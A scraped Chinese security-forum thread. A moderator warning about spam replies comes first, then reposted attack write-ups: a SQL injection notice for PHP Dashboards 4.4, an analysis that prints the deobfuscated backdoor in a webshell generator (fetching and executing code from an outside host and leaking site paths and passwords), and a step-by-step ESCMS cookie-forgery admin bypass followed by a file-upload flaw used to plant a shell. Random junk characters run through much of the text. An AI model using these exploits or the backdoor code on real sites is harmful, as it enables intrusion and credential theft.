最近看过此主题的会员

返回列表 发帖

灌水警告!!

可能因为近日论坛表情更新,所以部分论坛会员运用纯表情回复贴或一些无意义回复,这里予以灌水删帖处理!
! s4 Q" `* ?+ Q8 X% I/ |/ g; Q
3 R/ X- {6 F, ^2 D纯表情回复是对帖子作者的作品不尊重。所以请各位尊重发帖人,下不为例~~~
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

收到
http://chenming5869.blog.163.com/
百分百付出的汗水,百分百走向成功

TOP

楼上木JJ

TOP

还有一些回复奇诡的也该打压下

TOP

回复 4# 笨蛋》活该 : Q% C+ D' q6 l- n

7 m/ A0 b. L* T2 t9 ^. Z! L" f  r) V  v' E0 N2 e* ~+ G7 o  Z
   是的 比如3楼

TOP

泪流满面

TOP

PHP Dashboards NEW 4.4 - SQL Injection
# # # # # - F, ^" ]- J* `  W8 J  z1 c1 Z
# Exploit Title: PHP Dashboards NEW 4.4 - SQL Injection
5 t+ v6 E$ j. N' ]# N( u% F# Dork: N/A' m' o4 x( b' D; ?7 H2 u' x# ^2 s: x+ Y. b
# Date: 11.09.20178 E$ B# F. Q* f' m9 J% f
# Vendor Homepage: http://dataninja.biz/: _6 u  }/ J% v; B' ~
# Software Link: https://codecanyon.net/item/php-dashboards-v40-collaborative-social-dashboards/19314871. U  I/ C# K2 e
# Demo: http://phpdashboardv4.dataninja.biz/0 s; z: y+ r& i
# Version: 4.4, W: s4 `) B8 C: k  s% p! N& d
# Category: Webapps
/ l- W; v: _9 j# Tested on: WiN7_x64/KaLiLinuX_x64. O% X$ x( Q( O; x4 v
# CVE: N/A
* q% `; \4 l  q* R' s( y: U# # # # #8 A/ u" C5 m" q: g- k( L
# Exploit Author: Ihsan Sencan- L3 T) h6 I6 m
# Author Web: http://ihsan.net7 B( J# f4 a8 ?0 {  O0 `% m$ f- p
# Author Social: @ihsansencan) N. S8 [6 u9 x) n/ y  e
# # # # #
8 x  {! u, b& V' Z' Q; [6 G" I" f# Description:0 K: ^$ s, d+ Q8 k( ?5 o+ O
# The vulnerability allows an attacker to inject sql commands....% i# R6 e$ U) |9 R1 c
# ' @* Q* q4 N; _  _
# Proof of Concept:$ x* f8 a8 X! d" A! L
#
% F% ~; V+ q1 H; Q# j" k2 l( U. ^# http://localhost/[PATH]/php/share/save.php?dashID=[SQL]% L0 _4 f: P& x
#
. B1 r+ i, v# @% P# Z9 E# http://localhost/[PATH]/php/save/db.php?dashID=[SQL]
1 }2 [3 M, _. G" B9 a+ S, p: h! @$ p3 C: d  F. z+ n  C! W; F7 n
# . Z; d4 V4 t& _# [/ ^6 r7 L
# Etc..
' o. H& G4 B/ [/ F9 a0 @5 n# # # # #
, @: p/ [9 [  z1 R8 a2 B
# x& C6 \/ {* X; n2 m+ P6 S! P
, O4 ^& |9 L& i, Q5 x8 f( z) Q, ?6 J8 S  D+ m" N! s$ }
  G" ]4 j$ B6 M; R' i
. t% s# z1 P' g* F+ b+ q3 R& B7 Y
7 @: c& P" w+ w; M1 B  X2 h

' }/ |3 g+ ?2 U* X7 s4 M: _* A) j& a: A" M6 `5 J* L: p) k; p1 T+ o3 ^
( M2 F  c% b, I% {, n/ z

' N  }" D$ J* ~2 m) V: E) l! M* N4 ^) H! @2 u- _* {: w4 z1 a
0 ]% @9 Y. |/ z2 \) ^! _- B" S# y) y
/ G# c3 f1 t: |/ S" A

' X7 l( E3 C, W% w
+ q: q% D1 O8 \* k) n% z( n  w) \
7 t  V1 c# h. k) X: q, y; r$ M' i) B) V, u

" C( o- c7 j; b# V公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

[转载]十三WEBSHELL终结版后men的发现之旅
[转载]十三WEBSHELL终结版后men的发现之旅
! z% B: B8 R* j* Z; v1 J9 y) q7 _+ t作者:TheLostMind来源:绝色笔记自从上次从网上找了个WebShell管理网站,后来发现有*, 被人挂马了,数据库被破坏了,至今还没修复……所以对别人的WebShell格外小心。网上找了个十三WEBSHELL终结版生成器,如图下面我们来生成一个ASP WebShell生成后的WebShell是加密的这个解密直接用工具了,就不详述,解密后代码如图132.JPG看看代码, 还是加密的从代码中很容易可以看到他的解密函数是SinfoEn那么我们就来解密出来,解密的代码已经有人写出来了。下面是冰点极限论坛上贴出来的解密代码:===============================decode.asp======================================<%Pos=2 '解密固定值Function Fun(ShiSanObjstr)ShiSanObjstr=Replace(ShiSanObjstr,"|","""")For ShiSanI=1 To Len(ShiSanObjstr)If Mid(ShiSanObjstr,ShiSanI,1)<>"!" ThenShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&amp;ShiSanNewStrElseShiSanNewStr=vbCrLf&amp;ShiSanNewStrEnd IfNextFun = ShiSanNewStrEnd FunctionFunction SinfoEn(ObjStr,ObjPos)ObjStr=Replace(ObjStr,"~","""")NewStr=Split(ObjStr,"`")For i=0 To UBound(NewStr)SinfoEn=SinfoEn&amp;EnCode(NewStr(i),ObjPos)&amp;vbCrLfNextSinfoEn=Left(SinfoEn,Len(SinfoEn)-2)End FunctionFunction EnCode(ObjStr,ObjPos)Dim NewStr,TmpStr,i,LenStrLenStr=Len(ObjStr)For i=0 To Int(LenStr/ObjPos)-1TmpStr=Mid(ObjStr,i*ObjPos+1,ObjPos)&amp;TmpStrNextEnCode=TmpStr&amp;Right(ObjStr,LenStr Mod ObjPos)End Functiondata=request.form("x")if data="" then data="nothing"response.write "<form method='post'>"response.write "<textarea name='x' cols='80' rows='30'>"response.write Server.HTMLEncode(SinfoEn(data,Pos))response.write "</textarea>"response.write "<input type='submit' name='Submit1' value=' 提交 '>"response.write "<input type='reset' name='Submit32' value=' 重置 '>"response.write "</form>"%>===============================end===========================================现在就直接解密,解密后的代码如133.jpg按照普通的搜索*的方法,当然是搜索如HTTP之类的代码,我搜索了一遍,没有发现可疑的代码。搜索关键子:UserPass看看它的密码验证代码:====================================================================================if session("web2a2dmin")<>UserPass thenif request.form("pass")<>"" thenif Serinf(request.form("pass"),pn)=UserPass thensession("web2a2dmin")=UserPassresponse.redirect urlelserrs"非法登录"end ifelsesi="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><a href='"&amp;SiteURL&amp;"' target='_blank'>"&amp;mname&amp;"</a><hr><form action='"&amp;url&amp;"' method='post'>密码:<input name='pass' type='password' size='22'> <input type='submit' value='登录'></form><hr>"&amp;Copyright&amp;"</div> </center>"RRS sIend ifresponse.end=======================================================================================密码用Serinf函数加密然后进行验证,代码正常,没有可疑的迹象我们在搜索Serinf,看到如下代码:========================================================================================if session("serinfo")=false thenSererInf "1ll4":session("serinfo")=trueelseif action="getTerminalInfo" thenSererInf "1ll4"end ifend if========================================================================================看到这里就觉得有点奇怪了,搜索session("serinfo"),可以发现session("serinfo") 在前面是没有定义的,那肯定是false了,那么我们就来看看SererInf()这个函数,搜索SererInf,找到如下代码:============================================================================================function SererInf(inf)on error resume nextSet theserver=Server.createobject(Sot(13,0))theserver.open "GET",right(sot(13,0),4)&amp;chr(60-pos)&amp;"/"&amp;chr(pos+45)&amp;inf&amp;chr(46)&amp;mid(sot(4,0),2,1)&amp;chr(109+pos)&amp;right(Sot(6,0),1)&amp;chr(47)&amp;right(sot(1,0),1),falsetheserver.send()if theserver.readystate<>4 thenexit functionend ifexecute(theserver.responseText)set theserver=nothingif err.number<>0 thenerr.Clearend ifend function======================================================================================看到这里就很明白了,这就是*,那么我们的*到底是怎么样的呢?还是把下面这句解密开来看看=======================================================================================right(sot(13,0),4)&amp;chr(60-pos)&amp;"/"&amp;chr(pos+45)&amp;inf&amp;chr(46)&amp;mid(sot(4,0),2,1)&amp;chr(109+pos)&amp;right(Sot(6,0),1)&amp;chr(47)&amp;right(sot(1,0),1)==========================================================================================继续搜索sot,发现sot数组的值如下:========================================================================================Sot(13,0) = "Microsoft.XMLHTTP"Sot(4,0) = "Scripting.Dictionary"Sot(6,0) = "Adodb.Stream"Sot(1,0) = "wscript.shell"===========================================================================================继续上查,可以看到pos=2,那么我们现在就可以把上面的这段用函数加密了的代码解密出来了,很简单。right(sot(13,0),4)=httpchr(60-pos)=:chr(pos+45)=/chr(46)=.mid(sot(4,0),2,1)=cchr(109+pos)=oright(Sot(6,0),1)=mchr(47)=/right(sot(1,0),1)=l隐藏得的确很巧妙!解密的代码如下:==========================================================================================http://1ll4.com/l=========================================================================================看到这里是不是觉得很奇怪?怎么*代码不完整呢?不急,我们再来打开http://1ll4.com/l这个网址看个究竟。打开http://1ll4.com/l页面,查看源文件,代码如下:==========================================================================================Serurl="http://1ll4.com/1/?jpg=8&amp;u="&amp;Serveru&amp;"&amp;p="&amp;UserPassSet theserver=Server.createobject(Sot(13,0))theserver.open "GET",Serurl,falsetheserver.send()=========================================================================================现在看到这里就完整了,参数Serveru=request.servervariables(""http_host"")&amp;url,即网站的完整路径,参数UserPass当然就是密码了,虽然是加密的,不过可以解密!到这里,WebShell里面的*就完全显露出来了,接下来的事情当然是去*!我这里修改了这个WebShell,除去了*,增加了部分功能,改善了部分功能,不知道放到哪里下载,大家可以到我的BLOG上看:http://hi.baidu.com/lostmind从代码中还可以看到,这个提交没有COOKIE验证,那么我们就可以直接提交代码了,可以直接找个HTTP破解器,把地址和参数写进去,然后DOS它一把!当然大家不要D它了,写个WebShell也不容易,原谅他吧!同时也提醒朋友们都留心,别人的东西还是仔细看看。* [. Q$ Z* _6 P: j! Q

8 Q) {! p3 F" w/ {" ?0 t" w
" O6 }6 l4 j3 ~9 q- @7 q) O' @. l% s: g! m" o6 ?4 Y2 Y
6 I+ _$ H* Z% T( E! i1 g
1 x) s& H! ?- ~# T$ G3 l
  ]  ^2 ^; n& Y% D  p9 I6 F8 H

7 M# u0 F! r' o! J( d% f# s3 [6 w$ g4 }/ }
) w9 R  m9 F% O$ q+ L8 F9 ^+ Q
( H! p/ B4 x# ]
( W! _( ]- L3 ?2 I7 r* ^% r
# d8 k6 V" D" p$ K

9 e' U5 G) |  [, I' V0 S% T: T8 J* f5 f# a# Y) d7 a
/ M/ t0 }0 ~% c1 a/ d0 \" l
+ K: k+ A# s& d2 T% |; f

! l. U. V+ s. K# Y& G! B0 w" F
4 |( F& d; X4 O0 N公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

ESCMS cookies欺骗0day
版本:ESCMS V1.0 SP1 Build 1125$ B% _! v6 r' X+ k0 Y
后台登陆验证是通过admin/check.asp实现的,看代码
5 d: T/ u1 `, b# Q
" P2 H9 W% R; ]" j9 Y6 x* W. n, Z
<%
0 W7 q& O( Z, X: s% D) M9 ~9 }& `if Request.cookies(CookiesKey)("ES_admin")="" then 0 n9 }" K. S* ~: O4 P
'注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空+ c  U. B8 Q7 q) ^% m+ m
'CookiesKey在inc/ESCMS_Config.asp文件中,默认为ESCMS$_SP2
& \$ ^8 J" G% k/ m5 L  z$ [: dCall Err_Show()
) h, S; _. V; sResponse.End(); T( ]# D" O: w/ I1 H' \( H
End if
1 N/ J6 e. w7 h......
0 e# Z; D% {# n/ f/ Y3 t( n  k%>9 D( s' C4 C3 u! H
首先我们打开http://sitedir.com.cn/admin/es_index.html

4 p  W6 L& P0 I. q/ K( b' s; K2 T8 A
. {  y! j; O( f6 L0 J
0 A9 n* m$ E! O+ q: Z4 Z
然后在COOKIE结尾加上
8 M. ^  I% v+ F. {7 S; ESCMS$_SP2=ES_admin=st0p;

4 i4 ?$ F  U# U' T0 |
修改,然后刷新
9 ]5 E4 K/ U% U( l) c
进后台了嘎..
+ H. J9 \+ J7 D' |2 ^& H  M/ ]
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL,看代码
6 w/ |/ |/ T9 h% v% }  y; P
......& n  r9 }& m, L6 P% j
formPath=upload.form("filepath") '此处没有过滤
' @1 I3 f! D& M2 P2 ?: Z& u2 {if formPath="" then
# p; Y5 u9 C# Z! eformPath="../Upfile"" |2 W# w! J! Q+ L1 s& f; ^0 h
end if
% K; Z& ?& g( o+ z8 n/ [Dim formPath1
) v; q+ w$ W3 k& r5 \' @+ |formPath1="Upfile/"
) K4 H1 W. k( g) Z. H$ C0 X; E'在目录后加(/)  y/ _4 T: z  _1 \9 k4 F
if right(formPath,1)<>"/" then
6 {* p8 `2 P4 T* q8 f7 z0 PformPath=formPath&amp;"/"
7 y) [  j' X4 i( P0 x/ D1 u' Gend if
$ k1 d6 V3 ]: R8 x! f" bfor each formName in upload.file '列出所有上传了的文件6 A0 M1 P. ]" Z+ g7 Y
set file=upload.file(formName) '生成一个文件对象
" ]  A) ]  X2 k* a9 Eif file.filesize<100 then9 c  C% [; l3 g
response.write "请先选择你要上传的图片! [ <a href=# onclick=history.go(-1)>请重新上传</a> ]"5 `2 Y; s6 }, [9 c; l0 K
response.end
0 Y1 E# o7 {7 s! U. [end if
$ `+ V0 m1 O7 t0 d2 [& D% }0 v
fileExt=lcase(file.FileExt)) t+ H7 L! c- k) S
if CheckFileExt(fileEXT)=false then
+ T: n& c4 C/ S2 T0 w# ?9 lresponse.write "文件格式不正确! [ <a href=# onclick=history.go(-1)>请重新上传</a> ]"
$ [7 j5 @2 W. w8 [- A$ jresponse.end1 Z+ f: z+ f. C- h0 @, O) B2 g
end if
0 k& D# C$ K$ k% x$ T
'randomize; B$ @' E% N. [4 D
ranNum=int(90000*rnd)+10000
, q! G! [  m4 n: }1 gDim tempname,temppath
. s" a( x9 @2 P: S+ vtempname=year(now)&amp;month(now)&amp;day(now)&amp;hour(now)&amp;minute(now)&amp;second(now)&amp;ranNum&amp;"."&amp;fileExt! _8 k9 k! z, X( z, ~5 Q! z) @
temppath=formPath1&amp;tempname! X6 Y" h9 l& }
filename=formPath&amp;tempname
9 s* s) o+ X# [9 f" R" Pif file.FileSize>0 then '如果 FileSize > 0 说明有文件数据8 y  @% D/ d3 W3 _! B: W
result=file.SaveToFile(Server.mappath(filename)) '保存文件,这里地址就会变成我们截断的SHELL名称( \9 M% E8 B: j, y: `( X/ g
......

- l1 z8 h0 F& W  w* T
1 `" a. Z4 G( B5 @. t( i" e利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.

2 z+ ~& x- D1 R  _' T
成功了,shell地址为http://www.sitedir.com.cn/admin/diy.asp
1 j5 I# v  [) v! t存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
$ X, M& Q: ]! ]+ u) Q) I! _
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了,因为此版本用session来验证登陆…

. f, ?8 w8 ~3 }) |" F  F

7 C& G6 k- k8 h, D
" W0 V( X& D& h* z4 A( ]% M+ F# t( m3 Q( T! n

- Z9 X8 L1 s3 j$ f7 Q: b& E
/ k6 m) E; `  F: I4 D* {) J" k: d3 G0 M9 }: o* }# i
9 S5 ]! t8 q& C; P# a* s1 y* r. R
( ~2 h2 ]  H' r( M8 x; C& ^, F9 i

4 C1 Y7 B% j' P1 w2 [0 w
/ p, ]& I  M6 ~8 W; q) Z& j3 |/ ^+ M6 r0 m
# Q0 c) z3 ]! U* y

: }- ^' H7 R8 ~5 A5 s! g
2 t2 D; x3 T8 w8 [8 y/ N- k  r: Z4 Y* J1 |7 I" T3 R
3 W0 Q1 p6 k# V* e- |8 G2 U
1 N6 T7 t9 F) i% ~6 ^

  j9 y4 w7 v0 A" h8 ]3 u
% K% ^) d1 K; C! p
1 q- e3 ]+ v& T: Y2 L3 x8 A5 Y( J公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表